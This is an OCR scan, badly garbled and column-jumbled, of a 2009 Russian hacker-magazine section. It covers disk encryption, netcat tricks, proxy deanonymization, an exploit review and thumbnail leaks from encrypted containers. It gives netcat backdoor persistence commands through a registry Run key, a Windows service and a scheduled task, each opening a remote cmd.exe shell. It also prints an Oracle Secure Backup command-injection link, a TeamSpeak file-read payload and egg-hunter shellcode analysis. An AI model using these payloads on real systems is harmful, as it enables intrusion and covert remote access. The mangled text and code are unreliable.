РЕШЕНИЕ: 



Ты, наверное, знаешь, что такое криптоконтейнеры. Под этим тер- 
мином подразумевается раздел винта заранее заданного объема, 
предназначенный для хранения конфиденциальной инфы и целиком 
шифруемый каким-либо алгоритмом. Основным критерием при 
выборе утилы для работы с контейнерами является стойкость алгоса 
и удобство управления крипторазделами. Сейчас мы подробно 
рассмотрим, как надежно и эффективно сохранить твои данные. 
Использовать будем тулзу Бізк Сгуріюг, она бесплатна и распростра- 
няется с сорцами, что исключает наличие посторонних закладок в 
проге. Итак: 

1. Сливаем ѵтилѵс ШрУ/сІізксгѵрІюг.пеІ или с нашего ДВД. 

2 . Устанавливаем драйвер программы для Винды и ребутимся. 

3. Запускаем прогу (в случае с гуишной версией] выбираем интересую- 
щий нас раздел и нажимаем «Епсгурі». 

4 . Выбираем алгоритм шифрования, вводим пасс (чем сложнее —тем 
лучше) и запускаем процесс крипта, который займетприлично времени 
(в зависимости от размера диска]. 

5 . Доступ к шифрованным данным можно получить посредством Оізк 
Сгуріог’а. А именно — монтируем выбранный раздел (батон «МоипЫ, 
вводим пароль... и готово. 




Криптуем винт 



6. Если тебя по каким-либо причинам не устраивает гуишная версия 
утилы, —ты вполне можешьзаюзать консольную. Было бы желание :). 

7 . После завершения работы с криптоконтейнером желательно произ- 
вести демонтирование раздела вручную, в противном случае — это будет 
сделано автоматически. 

Кстати, прога умеет криптовать системный раздел, то есть тот, на который 
установлена Винда. Расписывать, что и как, я не буду, ибо алгоритм 
действий схожий. Думаю, ты вполне разберешься и сам. 




ЗАДАЧА: 



| НЕОБЫЧНЫМ СПОСОБОМ ЗАПУСТИТЬ ЫЕТСАТ С 
ЯВНОЙ ВЫГОДОЙ ДЛЯ ХАКЕРА 
РЕШЕНИЕ: 

Приведу несколько способов запуска пеІсаПа, о которых мало кто 



знает. 

1. Бекдоринг пеІюаПом — путем добавления соответствующего клю- 
ча в ветку реестра для автозапуска: 



гед асМ НКЬМ\8о1Сѵѵаге\МісгозоІЦ\Мпсіоѵѵз\ 
СиггепСѴегзіоп\Кип /ѵ по /С КЕС_82 /сі " с : \ѵѵіпс1оѵѵз\пс . ехе 
— <3. 192.168.1.70 1234 -е стсПехе" 



При последующем логине в систему произойдет запуск пеісаі: с 
открытием шелла на 1234 порту. Нюанстут втом, что бекдор испол- 
нится с правами того пользователя, который залезет на эту машину. 
Поэтому такие действия вполне могут открыть доступ полноценного 
администратора домена. 

2. Исполнение бекдора в режиме «ѴѴіпсІоѵѵз Зегѵісе». Вообще, п еісаі 
никогда не был заточен под виндовую службу, но, извратившись, мы 
можем сделать его таковым: 

зс сгеаСе ЫеСѵѵогк СоппесСіопз Зегѵісе ЫпРаЫт= " стсі /К 
зСагС с:\пс.ехе -сі 192.168.1.70 1234 -е стсі. ехе" зСагЦ = 
аиЪо еггог= ідпоге 

Командой 5С создается сервис с несуществующим именем (чтобы 
в глаза не бросалось] «Ыеіѵѵогк Со ппесО о пз Зегѵісе». Флаг зіагі» 
аиіо указывает, чтобы сервис запускался сразу после загрузки ОС, 
а еггог=ід по ге — запрещает посылать какие-либо логи в системный 
журнал. Если все сделано правильно, то тебя обрадует надпись 




« [ЗС] СгеаІеЗегѵісе 51ІССЕ55». Соль в том, что даже если операци- 
онка будет перезапущена, с ее включением бекдор вновь начнет 
свою работу. 

3.3а пуск пеісаі с использованием ѴѴіпсІоѵѵз Тазк Збесіиіег (плани- 
ровщика задач]. Как вариант, можно запустить пеісаі в опреде- 
ленное время, а именно — когда темно и тихо. В этом нам поможет 
встроенный в ѴѴіпсІоѵѵз планировщик. 

пеС зСагС зскесіиіе 

а С 12:00:00 / еѵегу : т , С , ѵѵ , СЪ. , 1 , з , зи " "с: Хпс.ехе -сі 
192.168.1.70 1234 -е стсі. ехе"" 

Каждый день (буквы отвечаютза дни недели), в 1 2:00:00, у нас будет 
открываться шелл. 
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ЗАДАЧА 



^ ПРОСКАНИРОВАТЬ ПОРТЫ ЫЕТСАТ'ОМ 

РЕШЕНИЕ: 

Мало кто знает, что пеісаі: может выступать отличным средством скани- 
рования портов. Достаточно запустить его в соответствующем режиме: 

ПС -2 -п -V -те 1 192.168.1.100 1-1024 

пс -п -ѵ -те 1 -2 192.168.1.100 20 21 22 25 80 8080 

В обоих примерах используются следующие флаги: 

-2 (гего-іприб/оибриб тобе) (работа без программных 
задержек) ; 

-п (пишегіс-опіу , используем, так как задается ІР-ад- 
рес , а не домен) ; 

-те (таймаут на коннекты в секундах) . 



~ - пс-еие -г -п -ѵ і» I ю.гггі.бі >-1024| 

С : Ч&йсипепЁ л дп Л ЕеСІ: ігідіЧдпііі’а ,і\Рабочн-и сто/Опс.е-хіе -1і 
I и 1 . 1 1 КТ «им . и и 1л масс Зі , е с саС / 3 

соппесС Со 2 отеи}іеі*іі пс Е-орІгіопі 1 ЗтзСпате рйРСІз] [рогСЕ ] ... 

1і$ип іпЬйшпЛ: пс -1 -р рйі'С [срСіопсЗ Е >і о з С п а то 1 [роН;] 

орсіоп? : 

-А іеСасЗі Л-ап сстзоіе, ЪАскді'сшпгі по сіе 



-ІРІ : 



-с ртч)? іпЬочпіі ргодглп іо скео Ылпдсгоиз Т 1 I 

-д даіеыАу аоигсе-гоиііпд Іюр роіпіІэЗ, и» іо Э 
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Ой нс к пакетами с 10.22 2.1.61 по 32 йлііт: 

Ответ от 10.222.І.61- число Вагіт=32 врепя<інс ТТЬ=128 
Отпет от 10. 222.1.61: число йагіт-^32 орсрія<1ис ТТЬ-128 

Статистика Ріпд для 10. 222.1.61 = 
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Слбасапепіг апіі 5еСС іпуіЧапЛра ^Раеочнгі столХпс.еке 

-т?л 
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Сканируем порты пеІсаСс 



№8 



ЗАДАЧА: 



| ВЫЦЕПИТЬ РЕАЛЬНЫЙ ір-адрес негодяя, кото- 
рый СКРЫВАЕТСЯ ЗА ПРОКСЕЙ 
РЕШЕНИЕ: 

Для решения задачи советую тебе обратить внимание на проект от со- 
здателей известного хакерского комбайна Меіазріоіі- Ресіоак [ бесіоак. 
пеі ). Он посвящен разоблачению особо хитрых людей, применяющих 
средства анонимизации. В своем арсенале программа задействует 
следующиетехники добычи: 



тб5 ( ” зесгеб " . $_ЗЕКѴЕК [ ' КЕМОТЕ_АББК ' ] . $_ 

ЗЕКѴЕК [ ' КЕМОТЕ_РОКТ ' ] . біте ( ) . " зесгеб " ) ; 

Кактолько, мы получили секрет, смело юзаем следующий линкдля 
впаривания: 

сібгате згс="Ь.ббр: //бес1оак.пеб/бес1оак.Ьбт1?сіб=<иден 
тификатор> " >< / і бгаше> 

Для получения результатов просматриваем: 

бесіоак.пеб/герогб .Ьбт1?сіб=<идентификатор>&богтаб=бехб . 



• Традиционный вызов функции на языке 6АѴА; если у поль- 
зователя установлен Оиіск Тігпе, то 

путем загрузки специального параметра 
аплет попытается насильно вынудить 
браузер жертвы открыть «бігесб» 
соединение; 

• Метод прогрузки Шогб-документа 
с его авто-открытием, при котором 
незаметно со стороннего ресурса бу- 
дет подкачена картинка . Это поможет 
обойти прокси и спалить реальный 
БЫЗ-сервер пользователя; 

• Установка прямого соединения при 
обращении к ЕІазЬ-приложению; 

• Если у пользователя установлен 
Ібипез , который регистрирует в 
системе новый протокол обращений 
«ібтз», то хитреца можно заставить 
открыть свой плеер и установить пря- 
мое соединение с заданным ІШЬ. 

С недавнего времени разработчики сделали 
для своего проекта специальный «Оесіоакіпд 
Епдіпе Регионе АРІ», который можно использо- 
вать на сторонних ресурсах. Чтобы применить 
его, генерируем себеуникальный идентифи- 
катор: 



Подложный ѴѴогб -до куме нт позволяетопределить ІР-адрес 
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АНДРЕИ «5КѴ02» КОМАРОВ 



ОБЗОР ЭКСПЛОИТОВ 



01 



»Вгіе* 



ОРАСІ.Е 

МН0Г0ЧИСЛЕННЫЕУЯЗВИМ0СТИ 



Очередным ежеквартальным обновлением специалисты из Огасіе 
прикрыли около 40 брешей в своих продуктах. Все из них классифици- 
руются удаленной эксплуатацией и затрагивают такие маститые про- 
екты, как: ѴѴеЫодіс Эегѵег 7. 0/8. 0/1 0.0, Огасіе 9і/1 0д/1 1 д, Е-Визіпезз 
Зи ііе 1 1 і и многие другие. Пару лет назад, после заявления Ларри 
Эллисона отом, что детища его компании носяттитул «ипЬгеакаЫе», 
хакеры доказали, что он поторопился с выводами. Отметим, что 
почти все ниже перечисленные багги, имеют достаточно высокие 
критерии по риску (степени критичности]. По подсчету СѴ552 Різк 
Зсоге — МісгозоЛ ѴѴіпсІоѵѵз (1 0] / Ыпих и ІІпіх (7,5). Кособо кость всех 
продуктов Огасіе состоит из навороченности, при которой зачастую не 
соблюдаются простые истины. 



верки данных для авторизации — все, что потребуется, 
наличие сетевого доступа к серверу бекапов 

іб ( збгпсшр ( $тзд [ 0 ] , " Еггог:" , б)) 

{ 

// 8еб бке соокіе ир. 
зебсоокіе ( " ога_озЬ_Ьдсоокіе " , " " ) ; 
зебсоокіе ( " ога_озЬ_1соокіе" , " " ) ; 
$ога_озЬ_Ьдсоокіе = " " ; 

} 

// Кезеб БЕВШ_ЕХЕС. 

$БЕВШ_ЕХЕС = $ ббтр ; 

} 

Ьеабег ( "Ьосабіоп: /1одіп.ркр?с1еаг=уез" ) ; 



ОРАСЬЕ 5ЕСІІВЕ ВАСКОР (іО.І.О.З <- 10.2.0.2) 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 



»ТагдеІ5:| 



Вся линейка операционныхсистем, под которые написан сей продукт. 



Уязвимость найдена в сценарии авторизации (Іодіп.рЬр). Он входит 
в поставляемый с сервером хранения резервных копий РН Р-фрон- 
тенд, поэтому уязвимость можно назвать кроссплатформенной, 
вне зависимости оттого, под какой ОС будетустановлен сервер. 
Передающиеся данные с Іодіп.рЬр напрямую отправляются утилите 
оббехе. При этом не осуществляется никаких проверок на ограни- 
чение и контент данных, в чем можно убедиться, проанализировав 

ИСХОДНЫЙ КОД: 

іб (збгіеп ( $ога_озЬ_Ьдсоокіе) > 0 && $Ьиббоп == 

"Ьодоиб " ) 

{ 

// Тигп ВЕВШ_ЕХЕС б о обб 
$ бшр = $БЕВШ_ЕХЕС; 

$БЕВШ_ЕХЕС = "по"; 



» Ехріоід 



Эксплуатация вполне наглядна — в том месте, где мы имеет доступ к 
серверу и минимальные права, можно создать собственный сценарий и 
попробовать что-либо исполнить. Неавторизированное создание файла 
выполняется следующим ядовитым линком: 

Ьббрз : / /<багдеб>/1одіп . ркр?с1еаг=по&ога_озЬ_ 
1соокіе=аа&ога_озЬ_Ьдсоокіе=ЬЬ&Ьиббоп=Ьодоиб&гЬбоо1=сш 
б. ехе+/с+есбю+1іе11о+ѵтог1с1 + %ЗЕ+с : Хогасіе . зесиге . Ьаскир . 
бхб+ ; 



»5оІи1іоп 



Самое простое решение проблемы — отключить ѴѴЕВ-сервер, не 
забыв о вышедших обновлениях. В версии 10. 2. 0.3 брешь устранена. 



// Тешіпабе бке соппесбіоп. 

$дг_сошшапб = " $гЬбоо1 --бегшіпабе $ога_озЬ_ 
Ьдсоокіе-$ога_озЬ_1соокіе" ; 

$тзд = ехес_дг ( " $дг_сошшапб" ) ; 

// ехес_дг вызывает РНР-функцию рореп, для исполнения 
команды в свою очередь, переменная $дг_сошшапб может 
хранить заведомо вредоносные параметры (/Ьіп/зб, сшб 
ехе) для неавторизированного выполнения кода без про- 



«АРАСНЕ СОММЕСТОР» 

ОРАСЬЕ ВЕА ѴѴЕВЮСІС 5ЕРѴЕР 

ПЕРЕПОЛНЕНИЕ БУФЕРА 
В КОМПОНЕНТЕ 



» Вгіе^ 



Путем посылки специально сформированного НТТР-пакета 
фиксированной длины злоумышленник может удаленно нарушить 
корректную работу ѴѴЕВ-сервера. Успешная реализация приво- 




► озб 
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» 



ІЗГшсСіурІ Иі ѳ ЁЗ 

УсІигЛеі 5 ^ЗДіГі КеуТІ« Т^>0І$ 5«Фл$І Цеір Нсте^де 




Подключенный контейнер (обычный) 

дит к БоЗ-атаке. На Заѵа достаточно обратиться с помощью Р05Т- 
за проса к/цзр с достаточно длинным параметром. Реализация 
атаки в псевдо-коде будет примерно следующей: 

$а = "А" х 6000; 

# инициализация сокета 

# отправка РОЗТ 

"РОЗТ / . з зр $а\г\п\г\пНозб : 1оса1Тюзб\г\п\г\п" ; 



»ТагдеІ5| 



ВЕА ШеЬЬодіс Зегѵег 6.x,7.x,8.x,9.x, 10.x 



» Ехріоід 



Одним из первых авторов, обнаруживших уязвимость за- 
долго до публичного релиза (в июле 2008), стал товарищ 
КіпдСоре. Боевой эксплоит можно найти здесь — 

сот/ехрІоіІз/6089 . 
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одержимое обычного контейнера (на фотографии — лунный модуль 
ССР) 



Все бы ничего, да при выводе справки «беір ѵег» читает файл из папки 
.ЛсрциегубосБ/ ѵегТхЕ Существует возможность изменить параметр в 
этом обращении и прочитать конкретный файл на системе. Пример: 



беіпеб ІосаІТюзб 51234 

Ъеір /Ьооб . іпі\0 ( \0 — нуль- байт) 



Особый интерес для чтения могут представлять файлы: 



зегѵег. Іод — в данном файле может быть расположен пароль 
суперюзера ТЗ 

зегѵег. сПэз — в данном файле может быть расположен пароль 
суперюзера ТЗ 

/Ъооб . іпі 
/ебс/раззжі 

/изг/ІосаІ/арасйе/сопІ/ЬДСрб. сопі ебс . 



»ТагдеІ5| 



Описанные версии на платформахѴѴіпбоѵѵз/ипих/ІІпіх. 



»5оІи(іоп 



Установить на сервер специальный плагин и радоваться жизни : 

Йр://апопѵтои5:беѵ2беѵ%40Ьеа%2Есот(бЙрпа.Ьеа.сот/риЬ/ 
геІеазез/зесигйѵ/ѴѴІЗѴѴеЬЗегѵегРІиаіпзІ .0.11 36334-Арасбе.гір 



оз 



» ВгіеП 



ТЕАМ5РЕАК5ЕРѴЕР 

<= 2.0.23.17 НЕМОТЕ КЕАР РІЬЕ 



Первыми, заметившими проблему, были люди из Неізе- 
Зесигііу ( 

Теат5реак-2-8егѵег--/пеѵѵ5/93734) . но в паблик никакой 
подробной информации они не пустили. В итоге, наш соотечес- 
твенник с4 1 1 к расковырял этот сервис и выпустил на потеху 
народу опасный эксплоит. Опасность заключается в том, что 
при непосредственном взаимодействии сТеатЗреак возмож- 
но чтение локальных файлов на сервере. Так, если ТЗ установ- 
лен на сервере, который админится через РІ_Е5К/СрапеІ,то 
при грамотном раскладе у хакера будет возможность прочитать 
их конфиги и влезть в саму панель. Т5 открывает по умолчанию 
три ТСР-порта : 



8767 — клиентское соединение 
1453 4 — ТАГЕ В - админка 
5123 4 — ТССЮиегу Абшіп 



|» ЕхрІоі1з| 



Полноценный эксплоит можно найти на форуме Апбсбабш Погигтъ 
ги/збоѵѵібгеаб.рбр ). 



»5оІи(іоп 



Ознакомиться с рекомендациями разработчиков и установить соответствую- 



Концептуальный вид известного корпоративного приложения Огасіе 
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РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 










воэевюе 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 










00000116 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 










80388128 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


Р9 


РВ 


Р0 


РР 


РС 


РС 


РС 


РР 










00000 130 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 










83388148 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 


РС 


РС 


РС 


РР 














Содержимое файла ІЬитЬсасЬе_96.сІЬ (курсор установлен в начало 
заголовка файла ВМР) 



щий патч можно здесь — 1 : огит.Іеат5реак.сопп/5ЬоѵѵІІігеасІ.рЬр?1=385 15. 

МІСК050РТ НТМІ ѴѴ0КК5Н0Р 

<= 4.74 ІЖІѴЕК5АІ. ВУРРЕК ОѴЕКРЮѴѴ 



» ВгіеП 



Интересное переполнение буфера, демонстрирующее новый метод в 
эксплуатации — «зЬеШзипбпд», благодаря которому эксплоит универ- 
сально исполняется на 2к, ХР, Ѵізіа . По сути, «зЬеШіипІег» — это просто 
участок кода, обладающий некой хитростью. 

Шелл-код ста вит 5ЕН -обработчик: 



Имя 



Дате изменения 



3* 

(Ф, іНи тЬ сас Ье_9б , 6Ъ 
& 1ЬитЬсасЬе256.сЗЬ 
И:ЬугтіЬсасЬе_І024,сІЬ 
Й іНитЬсасНе_і(Ь(.(ІЬ 
Й іНитЬсдсІіе_5г.с1Ь 



17,12.2303 21:40 
17 12,2003 21:40 
17 12,200321:40 
1712*2008 21:40 
18.12.2003 1157 
17122008 21 Ж) 



База данных эскизов ѴѴіпбоѵѵз Ѵізіа 



Тип 

Оаіа Бвяе РіЗе 
Оаіа Базе Рііе 
Оа!а Базе Рііе 
Оаіа Базе Рііе 
Ра*а Вазе Рііе 
Оаіз Вазе Рііе 



Размер 

1КБ 
1 024 КБ 
1024 КБ 
1КБ 
8КБ 
1КБ 



Д ТтеСгур* 

Уоіотез 5^йет КеуГНе$ Тдок $еПіпд$ НЫр 



[о)В@ 

Нотераде 




СгеаіеѴоіите 



Цокоте РгорегИе».., | 



ѵуіреСасЬе | 



| С:№ег$\.РиР\р-ур{о.*е$1 
17 Ысч-ег иѵе НюЪгу 



3 5еІее*Эе... 
ѴокотеІооЬ... | Бгіесі Осѵісг... 



В***оигП 


ймЮ-Моцп* Оеѵкм | 


0*поип*АІ 


Еаі 



Подключенный контейнер (скрытый] 



004004С6 


$ 


58 


РОР 


ЕАХ 


004004С7 




83Е8 ЗС 


ЗБВ 


ЕАХ, ЗС 


004004СА 




50 


РБЗН 


ЕАХ 


004004СВ 




6А ЕЕ 


РБЗН 


-1 


004004СБ 




ЗЗБВ 


ХОР 


ЕВХ , ЕВХ 


004004СЕ 




64:8923 


МОѴ 


БШКБ РТК ЕЗ: [ЕВХ] , ЕЗР 


004004Б2 




ЕВ 05 


БМР 


ЗНОКТ ргод. 004004Б9 


004004Б4 


> 


Е8 ЕБЕЕЕЕЕЕ САШ ргод . 004004С6 



Баг присутствует из-за неправильной обработки заголовка файла. Все 
управление при ее исполнении передается на «ЗЬеІІЬипіег». 



#/ 

\ 

#01Б7 17ББ 




Асіѵапсесі ЗкеІІНипСег Сосіе — 




ЕВ ІЕ 


БМР ЗНОКТ 01Б717ЕБ 


1 


#01Б7 17БЕ 


83С4 64 


АББ ЕЗР , 64 


1 


#0ІБ7 17Е2 


83С4 64 


АББ ЕЗР, 64 


1 


#0ІБ7 17Е5 


83С4 64 


АББ ЕЗР, 64 


1 


#0ІБ7 17Е8 


83С4 64 


АББ ЕЗР, 64 


1 


#0ІБ7 17ЕВ 


83С4 64 


АББ ЕЗР, 64 


1 



По идее, сюда можно было бы сразу впихнуть шелл-код, но это не есть 
хорошо, — шелл-код может не уместиться по размеру. «ЗЬеШіипІег» 
ищет в памяти приложения, наша задача — просканировать память 
на заведомо известные сигнатуры, которые задаются в самом начале 
эксплоита: 



Можно было бы сделать эксплоит под какую-то одну из версий ѴѴіпбоѵѵз, 
но был бы он универсальным? Чтобы переполнить буфер, в конкреті-ге-за- — 
данном примере требуется всего 280 байт. Соответственно, такого места 
просто недостаточно для импорта геѵегзе/Ьіпб шелл-кода. 



Сканирование памяти: 
#01Б718ІВ В8 12121212 


МОѴ ЕАХ, 12121212 


#01Б7182 0 


6ВС0 02 


ІМБЬ ЕАХ , ЕАХ , 2 


#01Б71823 


ВА Б0ЕАЕБ7Р 


МОѴ ЕВХ, 7ЕЕБЕАБ0 


#0ІБ7182 8 


83С7 20 


АББ ЕБІ, 20 


#01Б7182В 


893А 


МОѴ БШКБ РТК БЗ: [ЕБХ] , ЕБІ 


#01Б7182Б 


3907 


СМР БШКБ РТК БЗ: [ЕБІ] , ЕАХ 


#01Б7182Е 


А 7 5 Е7 


ББ2 ЗНОКТ 0ІВ7182 8 


#01Б71831 


83С7 04 


АББ ЕБІ , 4 


#01Б71834 


6ВС0 02 


ІМБЬ ЕАХ , ЕАХ , 2 


#01Б71837 


3907 


СМР БШКБ РТК БЗ: [ЕБІ] , ЕАХ 


#0ІБ71839 


А 7 5 ЕО 


ББ2 ЗНОКТ 0ІВ718ІВ 


#01Б7183В 


83С7 04 


АББ ЕБІ , 4 


#01Б7183Е 


В8 42424242 


МОѴ ЕАХ, 42424242 


#01Б71843 


3907 


СМР БШКБ РТК БЗ: [ЕБІ] , ЕАХ 


#01Б71845 


А 75 Б4 





В этом коде сравнивается значение памяти по адресу в ебі с 24242424 и 
42424242. 



ту $1оокоиД1 = " \х24\х24\х24\х24\х48\х48\х48\х48\х42\ 
х42 \х42 \х42 " х 64; 

ту $1оокосШ2 = " \х24\х24\х24\х24\х48\х48\х48\х48\х42 \ 
х42 \х42 \х42 \х42 " х 64; 

ту $1оокоикЗ = " \х24\х24\х24\х24\х48\х48\х48\х48\х42\ 
х42 \х42 \х42 \х42 \х42 " х 64; 

ту $1оокоик4 = " \х24\х24\х24\х24\х48\х48\х48\х48\х42\ 
х42 \х42 \х42 \х42 \х42 \х42 " х 64; 



ББ2 ЗНОКТ 01В718ІВ 
#01В71847 83С7 04 

#0ІВ718ІВ В8 12121212 
#01071820 6ВС0 02 



АББ ЕБІ , 4 
МОѴ ЕАХ, 12121212 
ІМБЬ ЕАХ , ЕАХ , 2 



Теперь — в еах 424242. Далее сравниваем: 



#01Б7182В 893А 

#01Б7182Б 3907 



МОѴ БШКБ РТВ БЗ: [ЕБХ] , ЕБІ 
СМР БШКБ РТР БЗ: [ЕБІ] , ЕАХ 



► 038 



ХАКЕР 02 /122/ 09 






^ взлом 



Если совпало — берем следующее число: 

0ІБ71834 6ВС0 02 ІМББ ЕАХ , ЕАХ , 2 

#01Б71837 3907 СМР БШЕБ РТК. Б5 : [ЕБІ ] , ЕАХ 

Умножаем еах на 2 (получаем 484848). Если опять совпало — берем другое: 

#01Б7 183Е В8 42424242 МОѴ ЕАХ, 42424242 
#01В7 1843 3 9 07 СМР БШЕБ РТК БЗ : [ЕБІ] , ЕАХ 

#01Б7 1845 л 75 Б4 ББ2 ЗНОКТ 01Б718ІВ 

Итог: если в программе возникает исключение, «ЗЬеШіипІег» устанавли- 
вает зеб-ЬапсІІег (такой участок кода, на который будет передана обработка) 
— а исключения у нас возникают, когда «зЬеШіипІег» попадает в несущест- 
вующиеучастки памяти при сканировании на предмет поиска збеіісосіе, в 
чем можно убедиться из примера. Кстати, при анализе эксплоита я пошел от 
противного. Сначала можно просто запустить эксплоит, получив на выходе 
файл. Затем, с помощью стандартной утилиты (тазт32\Ьіп1:осІЬ.ехе) из па- 
кета МА5М или ее аналога, я решил сделать массив данных — впоследствии 
забить его в самописную минимальную прогу и реверсить дальше: 

686 

.ГШТ1Х 

.тосіеі ІІаБ , збсісаіі 
орБіоп сазетар:попе 

іпсіисіе дс!і32.іпс 
іпсіисіе кегпе132.іпс 
іпсіисіе изег32.іпс 
іпсіисіе зЬе1132.іпс 
іпсіисіе асіѵарі32 . іпс 
іпсіисіе ѵуіпсіоѵуз . іпс 
іпсіисіе пЕсІІІ.іпс 
іпсІисіеІіЬ дсіі32 . ІіЬ 
іпсІисіеІіЬ кегпе132 . ІіЬ 
ІпсІисіеІіЬ изег32 . ІіЬ 
ІпсІисіеІіЬ зЬе1132.1іЬ 
ІпсІисіеІіЬ асіѵарі32 . ІіЬ 
ІпсІисіеІіЬ пкЫІ . ІіЬ 

. сопзк 
. бака? 

. бака 

іпсіисіе 1 . кхк (то, что мы получили на выходе от 
Ьіп2бЬ) 

Бекаиікіпкегпек сіЬ ' НедД-О ' , 0 
. собе 
зкагк : 

іпѵоке МеззадеВохА, 0, оккзек Бекаиікіпкегпек , ЖШБ, 
МВ_ОК 

іпѵоке ЕхікРгосезз , 0 



, * КеыПыйЗД > ГЫлМпыіі &(.* ЙО 

сви 



т і Ѵі Г 



ГТЛГёП ИЯ 



• МП 1 ІІІ 



тЫт 



ссылай 

Г* ДоКуіІЕ»™ 

ЕР 



_ Р»6оч«Д (ТОП 
В Рш= 

06*1*1* 



і , Лекальный /рек (С:) 
СТОПЖдощсдНР 
і -м ЛйкІЛиінй /рек СЕ - ] 
Л 

иі Нвкіі Рйяіі ВНопиг 
С*Л 

а 



Содержимое скрытого контейнера 



[ОРТІСЖЗ] 

Сопкепкз кі1е=А 

Іпбех 1 1 1 е = АААААААААААААААААААААААААААААААААААААААААА 
ААААААААААААААААААААААААААААААААААААААААААААААААААААА 
ААААААААААААААААААА? а-ба-ба-ба-ба-ба-ба-ба-ба-ба-ТЗ 

! ! • ?Пі : ? 

Ха?<Рз 3-бе#? ?? кБ ! ! • ?0а ! е:9и?а! кБ 9и?а! 

ВВВВ9иБа ! ? ААА ААААА ААААА ААААА АААААААААААААААААААААААА 

АААААААААААААо @ 

[ЕІЬЕЗ] 

Уязвимость затрагивает секцию 0РТІ0Ы5 в параметре Іпбех Еі Іе. 



>>5оІиІіоп 



В настоящий момент уязвимость неустранима. 

РАСКРЫТИЕ ДАННЫХ ПРИ ХРАНЕНИИ ГРАФИЧЕСКИХ ИЗОБРА- 
ЖЕНИЙ НА ШИФРОВАННЫХ КОНТЕЙНЕРАХ 



» Вгіе{ 



Эскизы (ІЬ и тбпаііз) — уменьшенные изображения, дающие приблизи- 
тельное представление об их оригиналах. В ѴѴіпсІоѵѵз МЕ/2000/ХР/2003 
эскизы хранились в файлах ТЬитЬз.сІЬ, которые находились в директо- 
риях с графическими файлами. Начиная с ѴѴіпсІоѵѵз Ѵізіа , эскизы хранят- 
ся централизованно для каждого пользователя. Аналогичная система 
хранения эскизов присутствует во множестве окружений рабочего стола 
для ІІпіх-Ііке систем (например, 01Ч0МЕ]. Рассмотрим особенности баз 
данных эскизов в ѴѴіпсІоѵѵз Ѵізіа и в среде 6Ы0МЕ (Ыпих) при работе с 
зашифрованными файловыми системами. 

Ситуация в ѴѴіпсІоѵѵз VI ЭТА выглядит примерно следующей. База данных эс- 
кизов хранится в директории: «\ІІ5ег5\<имя_пользователя>\Арр0аІа\ЕосаІ\ 
М ісго5обі\ѴѴіпсІоѵѵ5\ЕхрІогег». Эта директория содержит следующие файлы: 



епб зкагк 

Грузим программу в ОНуйбд, вводим адрес начала секции данных и 
переходим туда (ПКМ -> ЫеѵѵОгідіп Неге). Такой прием позволит встать 
строго на начало шелл-кода. 



»ТагдеІ5:| 



ѴѴіпсІоѵѵз 2к, ХР, Ѵізіа 



» Ехріоід 



Эксплойт можно слить по адресу Ь[[р://т1[уу0гт.сот/ехр[окз/7727 . Он 

генерируетфайл определенного формата (з.Ьрр). При реверсе формата 
опознается примерно следующим образом: 

ХАКЕР 02 /1 22/ 09 



кЬитЬсасЬе_ібх . 6Ь 

кЬшпЬсасЬе_Ш. 6Ь, где «Ш» обозначает размер содержащих- 
ся в файле эскизов 
кЬитЬсасЬе_зг . 6Ь 

Файл «[ЬитЬсасЬе_ібх.бЬ» является индексом всей базы данных 
— в нем хранится информация о соответствии эскизов в файлах 
«1:ЬиппЬсасЬе_І\ІІ\І.сІЬ» с файлами на различных файловых системах. Этот 
файл начинается со строки «ІМММ». 

Файл «1ЬитЬсасЬе_1\11\1.с1Ь» содержите себе эскизы и начинается со 
строки «СМММ». Эскизы хранятся в различных форматах, например, 
ВМР и РЫ0, в «пачках» (сбипкз) данных — с целью исключения фраг- 
ментации. Цифра «N14» в имени файла обозначает размер (в пикселях) 

► 039 









взлом 



» 




=) еверс эксплоита в прогрессе — кособокий дамп файла загружен в 
память 



большей стороны эскиза. 

Стоит отметить, что в базе данных эскизов отсутствует я в на я информа- 
ция о путях к файлам, которым соответствует тот или иной эскиз. Вместо 
пути используется специальный идентификатор, который описывает 
исходный файл в системе. 

В механизме генерации эскизов в ѴѴіпсІоѵѵз ѴІ5Іа были обнаружены 
следующие особенности: 

1. Эскизы генерируются вне зависимости оттого, на каком носителе нахо- 
дится файл (локальном или удаленном, на жестком диске или на СО ит.п.); 
Для файлов, зашифрованных при помощи ЕР5, эскизы не сохраняются; 

2. Существующие эскизы не удаляются, если файлы шифруются при 
помощи ЕЕ5. 

Подобные особенности приводят ктому, что мы получаем: 

1. Возможность определить, какие графические данные хранились на 
подключенных сменных носителях; 

2. Возможность просмотра эскизов графических файлов на некоторых 
зашифрованных разделах и контейнерах; 

3. Возможность определения так называемых «скрытых контейнеров». 
Проведенныетесты показали, что эти продукты позволяют ѴѴіпсІоѵѵз 
создавать эскизы графических файлов, расположенных на зашифрован- 
ных файловых системах (сам эскиз при этом хранится на незашифрован- 
ном системном разделе): 

• ТгиеСгуріб.Іа (протестирован только режим создания контейнеров 
в виде файлов, тесты проведены как с обычными, так и со скрытыми 
контейнерами); 

• ВезЮгурІѵ. 8 (протестирован только режим создания контейнеров 
в виде файлов, тесты проведены каксобычными.таки со скрытыми 
контейнерами); 

• РОР Эезкіор 9.9 (протестирован только режим создания контейнеров 
в виде файлов). 

Для извлечения эскизов из базы данных можно использовать какспе- 
циализированные продукты (например, ЭМ ТЬиппЬз — ѵѵѵѵѵѵ.сІтіЬиппЬз. 
сопл), так и программное обеспечение, предназначенное для извлече- 
ния файлов по их внутренней структуре (например, Вэгетозі: — Шр:// 
ВэгетозВзЕпеІ и ЬасЬоіг-зиЬЕІе — ШрУ/ЬасВоіг.ога ). 

В среде 6Ы0МЕ эскизы графических файлов хранятся в домаш- 
ней директории пользователя (-/.іЬитЬпаіІз/погтаІ). Каждый эс- 
киз представляет собой графический файл формата РІЧО, в мета- 
данные которого включена информация служебного характера 
(путь к исходному изображению, размеры исходного изображения 
и т.п.). Эскизы генерируются вне зависимости отточки монтиро- 
